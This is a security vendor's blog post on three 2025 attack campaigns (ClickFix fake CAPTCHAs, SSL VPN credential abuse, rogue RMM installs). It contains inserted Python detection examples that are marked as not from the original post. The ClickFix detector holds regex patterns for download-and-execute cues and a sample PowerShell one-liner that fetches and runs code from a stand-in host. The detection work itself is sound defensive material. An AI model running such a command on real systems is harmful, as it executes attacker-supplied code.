The 3 Cyber Attack Campaigns That Defined 2025 and What They Mean for 2026
There’s a version of the cybersecurity threat narrative that focuses on escalation: more sophisticated attackers, more complex exploits, more advanced tooling. That version makes for good headlines. It’s also increasingly disconnected from what’s actually happening.
What the Blackpoint SOC observed across thousands of incidents in 2025 tells a different story. The most effective attacks last year were built on familiarity. Attackers logged in with real credentials instead of forcing their way through the perimeter. They used the same remote access tools your IT team uses, and mimicked the browser prompts your users interact with every day.
That’s the real shift. Familiarity, deployed as a weapon. And it changes the nature of the problem defenders need to solve.
Which Industries Are Most Targeted by Cyberattacks?
The organizations most frequently targeted last year share a common profile: they operate under tight timelines, they hold data worth stealing, and they often serve as access points into other organizations. Our SOC observed incidents across virtually every vertical, but five sectors absorbed the highest volume.
[Chart of the most-targeted industries, not reproduced here. Source: 2026 Annual Threat Report, Blackpoint Cyber]
What makes these numbers significant is what they represent structurally. A manufacturer going offline creates ripple effects across supply chains. A compromised MSP can become a passageway into every client environment it manages. Attackers understand the interconnected nature of these sectors, and they’re exploiting it deliberately.
The Three Biggest Cyber Attack Trends of 2025 and 2026
Three campaigns drove the bulk of what our SOC handled last year. Each one is distinct in execution but identical in logic: find what an organization already trusts and use it.
[Chart of the three campaigns, not reproduced here. Source: 2026 Annual Threat Report, Blackpoint Cyber]
What Is a Fake CAPTCHA or ClickFix Attack?
The most unsettling thing about Fake CAPTCHA and ClickFix attacks is how ordinary they look in the moment.
A user visits a website, often a legitimate one that has been quietly compromised, and encounters a verification prompt styled to look like a Cloudflare or Google security check. The prompt asks them to press Win+R and paste a short command to confirm they’re human. It looks like the dozens of similar interactions they’ve completed without incident. They do it. In that single action, the attacker gains direct code execution through native Windows utilities.
The Fake CAPTCHA and ClickFix campaigns accounted for 58% of all identifiable incidents last year because they sidestep a core challenge every attacker faces: security controls are built to catch malicious-looking behavior. ClickFix gets around that entirely by convincing users to run the code themselves, through tools the system already trusts.
The payloads delivered through this vector in 2025 ranged from credential stealers like Lumma and RedLine to remote access tools and loaders designed to pull down additional malware after the initial foothold. One evolution our team tracked closely was a technique called Etherhiding, where attackers moved their payload delivery logic into blockchain smart contracts. These contracts are immutable once deployed, so updating attacker infrastructure across thousands of compromised sites became a single operation. It’s a meaningful indicator of how organized and resilient these campaigns have become.
The most effective defenses are behavioral. Restricting the Windows Run dialog via Group Policy for standard users removes the primary execution path. Monitoring for clipboard-to-PowerShell command chains catches execution when policy restrictions are unavailable. Training users to recognize that legitimate sites will ask for a login or a CAPTCHA solve, never a command to paste into their own computer, remains one of the most direct mitigations available.
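The clipboard-to-PowerShell monitoring described above, as an added example that is not Blackpoint's code: a scoring heuristic for the "press Win+R, paste, run" chain, applied to constructed process-creation events shaped like Sysmon Event ID 1 / Windows 4688 fields. The field names, cue weights and sample events are assumptions for illustration.

```python
# Added example (not from the Blackpoint post): a heuristic for the "Win+R, paste,
# run" ClickFix chain, applied to constructed process-creation events shaped like
# Sysmon Event ID 1 / Windows 4688 fields. Field names and samples are assumptions.
import re

# The Run dialog is hosted by explorer.exe, so a paste-and-run shows up as
# explorer.exe -> script interpreter with a one-line download-and-execute command.
INTERPRETERS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe", "wscript.exe"}
# Each cue adds weight; a single cue (e.g. -w hidden) is common in admin scripts.
CUES = {
    r"\biex\b|invoke-expression": 3,
    r"\birm\b|invoke-restmethod|invoke-webrequest|downloadstring": 3,
    r"https?://": 2,
    r"-w(indowstyle)?\s+hidden|-nop\b|-enc(odedcommand)?\b": 1,
    r"mshta\.exe\s+https?://": 4,
}

def score_event(ev):
    """Return (score, reasons) for one process-creation event dict."""
    image = ev.get("Image", "").rsplit("\\", 1)[-1].lower()
    parent = ev.get("ParentImage", "").rsplit("\\", 1)[-1].lower()
    cmd = ev.get("CommandLine", "").lower()
    if image not in INTERPRETERS:
        return 0, []
    score, reasons = 0, []
    if parent == "explorer.exe":  # Run dialog or other interactive launch
        score += 2
        reasons.append("interpreter spawned by explorer.exe")
    for pattern, weight in CUES.items():
        if re.search(pattern, cmd):
            score += weight
            reasons.append(f"command line matches /{pattern}/")
    return score, reasons

def flag_clickfix(events, threshold=6):
    """Return events scoring at or above threshold, highest score first."""
    scored = [(score_event(ev), ev) for ev in events]
    hits = [{"score": s, "reasons": why, "event": ev} for (s, why), ev in scored if s >= threshold]
    return sorted(hits, key=lambda h: -h["score"])

# Constructed telemetry: a Run-dialog paste chain and a benign scheduled admin script.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "User": "CORP\\jdoe",
     "CommandLine": 'powershell -w hidden -c "iex (irm http://example.invalid/v)"'},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Program Files\RMMVendor\agent.exe", "User": "NT AUTHORITY\\SYSTEM",
     "CommandLine": "powershell -nop -File C:\\Scripts\\inventory.ps1"},
]
```

The threshold is deliberately above the weight of any single cue, so an admin running a hidden-window script is not paged while an interactive explorer.exe launch of a download-and-execute one-liner is.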
Why Is SSL VPN Abuse Still a Top Attack Vector in 2026?
In 2025, 33% of identifiable incidents involved SSL VPN abuse. SSL VPNs present a structural challenge for defenders: they must be reachable from the internet to function. That requirement also makes them a permanent fixture on every attacker’s target list.
What our data showed last year was primarily credential abuse rather than sophisticated exploitation of novel vulnerabilities. Stolen username and password. Successful authentication. A session indistinguishable from a legitimate remote employee checking in. The attacker arrived through the front door.
This is a network architecture problem as much as it is a credential security problem. In many organizations, a remote VPN session can reach domain controllers, backup infrastructure, and management interfaces with full freedom of movement. A single stolen credential becomes effectively unlimited in scope. Segmenting VPN address pools, enforcing MFA without legacy fallbacks, and treating authentication anomalies as high-priority signals are the structural controls that change that calculus.
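The "authentication anomalies as high-priority signals" control above, as an added example that is not Blackpoint's code: three checks run over constructed VPN authentication log lines, flagging a success without MFA (a legacy fallback still accepted), a success from a country outside the user's baseline, and a success following a burst of failures. The log format, the per-user baseline and the thresholds are assumptions.

```python
# Added example (not from the Blackpoint post): flag VPN authentications that
# warrant analyst attention, run over constructed log lines. The log format, the
# per-user location baseline and the thresholds are assumptions for illustration.
import re
from collections import defaultdict
from datetime import datetime, timedelta

LINE = re.compile(
    r"(?P<ts>\S+) vpn-auth user=(?P<user>\S+) src=(?P<src>\S+) "
    r"geo=(?P<geo>\S+) mfa=(?P<mfa>yes|no) result=(?P<result>success|fail)"
)

def parse(lines):
    """Parse well-formed lines; malformed ones are skipped rather than trusted."""
    recs = []
    for m in filter(None, map(LINE.match, lines)):
        rec = m.groupdict()
        rec["ts"] = datetime.fromisoformat(rec["ts"].replace("Z", "+00:00"))
        recs.append(rec)
    return recs

def detect_vpn_anomalies(lines, baseline_geo, fail_threshold=5, window=timedelta(minutes=10)):
    """Return (user, reason) tuples for successful logins that break policy or baseline.
    baseline_geo maps user -> countries seen during a clean reference period."""
    recent_fails, findings = defaultdict(list), []
    for r in sorted(parse(lines), key=lambda r: r["ts"]):
        u = r["user"]
        if r["result"] == "fail":
            recent_fails[u].append(r["ts"])
            continue
        if r["mfa"] == "no":  # a password-only fallback is still being accepted
            findings.append((u, "success without MFA"))
        if r["geo"] not in baseline_geo.get(u, set()):  # never seen for this user
            findings.append((u, f"new location {r['geo']} from {r['src']}"))
        fails = [t for t in recent_fails[u] if r["ts"] - t <= window]
        if len(fails) >= fail_threshold:  # burst of failures then a success
            findings.append((u, f"success after {len(fails)} failures within {window}"))
        recent_fails[u].clear()
    return findings

# Constructed log: a normal MFA check-in, then a password-only login from an
# unfamiliar country right after a burst of failed attempts.
SAMPLE_LOG = (
    ["2025-03-04T08:02:11Z vpn-auth user=asmith src=198.51.100.7 geo=US mfa=yes result=success"]
    + [f"2025-03-04T02:1{i}:00Z vpn-auth user=jdoe src=203.0.113.9 geo=XX mfa=no result=fail"
       for i in range(6)]
    + ["2025-03-04T02:17:30Z vpn-auth user=jdoe src=203.0.113.9 geo=XX mfa=no result=success"]
)
BASELINE_GEO = {"asmith": {"US"}, "jdoe": {"US", "CA"}}
```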
Patching edge devices matters, and both SonicWall and Fortinet had critical vulnerabilities actively exploited in 2025. Patching a single CVE, though, leaves the underlying condition intact: once inside an overpermissioned network, attackers have significant room to operate.
How Do Attackers Abuse RMM Tools?
Throughout 2025, 30% of identifiable incidents involved RMM tool abuse. Remote Monitoring and Management tools are, by design, a useful attacker utility. They provide persistent remote access, communicate over standard ports, generate traffic that resembles normal IT operations, and are expected to be present in most managed environments. When an attacker installs one, it registers as another remote session in an environment that already has several.
Campaigns our team tracked last year used phishing emails disguised as invoices, payroll documents, and government notices to trick users into running what appeared to be legitimate installers. The more resilient variant involved a layered approach: the initial malicious RMM tool was programmed to immediately install a second one from a different vendor, hosted on attacker-controlled infrastructure. Even when the first was identified and removed, the second was already in place, sitting quietly in an environment where multiple RMM tools legitimately coexist.
Distinguishing an authorized deployment from a rogue one requires going beyond presence to context. Where was it installed from? Under what account? Does it match the expected deployment pattern for that device? Those questions demand human investigation, which is precisely why this attack pattern is so durable, and why a human-led, 24/7 SOC makes all the difference.
The most effective structural control is a defined and enforced software inventory: knowing exactly which RMM tools are approved, where they should exist, and surfacing anything that falls outside that baseline. Combined with application controls that block installation from user-writable paths and monitoring for outbound connections to unusual domains, it removes the ambiguity these campaigns rely on.
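The software-inventory baseline described above, as an added example that is not Blackpoint's code: each discovered RMM install is checked for the context questions raised earlier (approved tool? expected directory? deploying account? user-writable path?), and a host-level pass flags the layered pattern from the campaign, a second RMM tool appearing minutes after another. The tool names, paths, accounts and inventory records are constructed assumptions.

```python
# Added example (not from the Blackpoint post): check discovered RMM agent installs
# against an approved-software baseline. Tool names, paths, accounts and the
# constructed inventory records are assumptions for illustration.
from datetime import datetime, timedelta

# Baseline: which RMM tools are approved, where they belong, and who deploys them.
APPROVED = {
    "AcmeRMM": {"install_dir": r"c:\program files\acmermm", "deployer": "corp\\svc-deploy"},
}
USER_WRITABLE = ("\\users\\", "\\appdata\\", "\\temp\\", "\\downloads\\")

def evaluate_install(rec):
    """Return reasons one discovered install falls outside the baseline (empty = ok)."""
    tool, path, who = rec["tool"], rec["path"].lower(), rec["installed_by"].lower()
    reasons = []
    if tool not in APPROVED:
        reasons.append(f"{tool} is not an approved RMM tool")
    else:
        if not path.startswith(APPROVED[tool]["install_dir"]):
            reasons.append(f"{tool} outside its expected directory: {rec['path']}")
        if who != APPROVED[tool]["deployer"]:
            reasons.append(f"installed by {rec['installed_by']}, not the deployment account")
    if any(marker in path for marker in USER_WRITABLE):
        reasons.append("installed from a user-writable path")
    return reasons

def evaluate_host(records, chain_window=timedelta(minutes=15)):
    """Evaluate every install on one host and also flag the layered pattern:
    a second RMM tool appearing minutes after another one on the same host."""
    findings = {r["tool"]: evaluate_install(r) for r in records}
    by_time = sorted(records, key=lambda r: r["installed_at"])
    for earlier, later in zip(by_time, by_time[1:]):
        gap = later["installed_at"] - earlier["installed_at"]
        if earlier["tool"] != later["tool"] and gap <= chain_window:
            findings[later["tool"]].append(f"installed {gap} after {earlier['tool']}")
    return {tool: why for tool, why in findings.items() if why}

# Constructed inventory for one host: the approved agent, then two unapproved
# agents dropped two minutes apart from the user's profile.
SAMPLE_HOST = [
    {"tool": "AcmeRMM", "path": r"C:\Program Files\AcmeRMM\agent.exe",
     "installed_by": "CORP\\svc-deploy", "installed_at": datetime(2025, 5, 2, 9, 0)},
    {"tool": "RemoteToolA", "path": r"C:\Users\jdoe\Downloads\invoice_setup.exe",
     "installed_by": "CORP\\jdoe", "installed_at": datetime(2025, 5, 2, 14, 3)},
    {"tool": "RemoteToolB", "path": r"C:\Users\jdoe\AppData\Local\Temp\rt.exe",
     "installed_by": "CORP\\jdoe", "installed_at": datetime(2025, 5, 2, 14, 5)},
]
```

The approved agent produces no findings, while both rogue agents are flagged on several independent grounds, so removing only the first one still leaves the second visible.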
What Do These Cyber Threats Have in Common?
The throughline across all three campaigns is the same: attackers are exploiting trusted tools and familiar workflows rather than novel exploits or zero-day vulnerabilities. What these attacks require is an organization whose defenses are calibrated to catch overtly malicious behavior, leaving activity dressed in familiar clothes to pass through unquestioned.
That distinction matters more than any individual tactic. Security programs built around signature detection and perimeter defense will keep missing the activity these campaigns produce, because the activity looks right. A VPN login looks like a VPN login. An RMM tool looks like an RMM tool. A CAPTCHA looks like a CAPTCHA.
Context is what breaks the pattern. Human-led detection, operating in real time with full environmental context, is what surfaces those signals. It remains the most decisive advantage defenders have. The response to 2025 is a reorientation around what “routine” actually means, and a willingness to question it.
Go Deeper in the 2026 Annual Threat Report
This post covers the shape of the problem. The 2026 Annual Threat Report covers what’s behind it: full attack chain walkthroughs for each campaign, how Adversary-in-the-Middle phishing is compromising Microsoft 365 environments by targeting authenticated sessions rather than credentials, how ransomware groups scaled victim listings, the full vulnerability landscape from 2025, and proactive defense frameworks built directly from what our SOC observed in the field. Download the report here.
Date published: April 24, 2026
Author: Blackpoint Cyber